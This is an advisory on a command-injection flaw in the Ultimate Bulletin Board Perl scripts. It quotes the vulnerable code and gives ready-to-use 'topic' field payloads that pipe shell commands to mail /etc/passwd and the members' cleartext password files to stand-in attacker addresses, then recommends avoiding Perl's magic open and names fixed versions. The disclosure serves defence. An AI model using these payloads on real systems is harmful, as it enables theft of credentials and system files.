COMMAND

    UltimateBB

SYSTEMS AFFECTED

    Systems with UltimateBB

PROBLEM

    Sergei A. Golubchik found following.  Writing cgi scripts in  perl
    is simple.  It's also  rather safe, providing authors follow  very
    simple instructions.  But they don't.  Browsing some site,  Sergei
    found that their forums were based not on home- made scripts,  but
    rather commercial software product.   They use commercial  package
    photoads.  Let's look what that Ultimate Bulletin Board by Infopop
    is.

    After 10-minutes grepping we find these lines:

        ubb_library.pl:901-902
                  if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
                  open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");

    (notice? not  /^\d\d\d\d\d\d\.ubb$/.   What did  the author  think
    about while writing it ? Girls  ?)  And the $ThreadFile takes  its
    value directly from the hidden (hmm!) field `topic'.

    When you fill the form with

        topic='012345.ubb|mail hacker@evil.com </etc/passwd|'

    It will happily give you /etc/passwd.  And

        topic='012345.ubb|cat Members/*|mail hacker@evil.org|'

    shows all  users of  bulletin board,  and their  passwords too (in
    cleartext!).  So one should  only open "reply" form in  the forum,
    save it to  disk, and set  topic field to  whatever he want.   And
    this stupid UBB (at least freeware version) doesn't keep the  logs
    (unless, so-called, hacklog, used when the condition above is  not
    met).

    This works on the full version also...  Little different syntax:

        topic=012345.cgi|cat%20../Members/*|mail hacker@evil.org|

    (note the ../ on  the Members.  You  have to go up  a directory to
    get  the  file.   Maybe  you  could  stop  it  via  simple  folder
    permissions??)

SOLUTION

    The fix  is obvious.   But the  rule of  the thumb  is "do not use
    magic perl open".   At least in cgi  scripts. If you want  to open
    regular file, sysopen does the trick as well.

    The latest  versions of  the UBB  (Freeware version  '2000', and a
    new release of licensed version 5.43d) contain fixes for this  bug
    as of 14th Feb 2000.  The fix has also been posted in this thread:

        http://www.scriptkeeper.com/ubb/Forum16/HTML/000814.html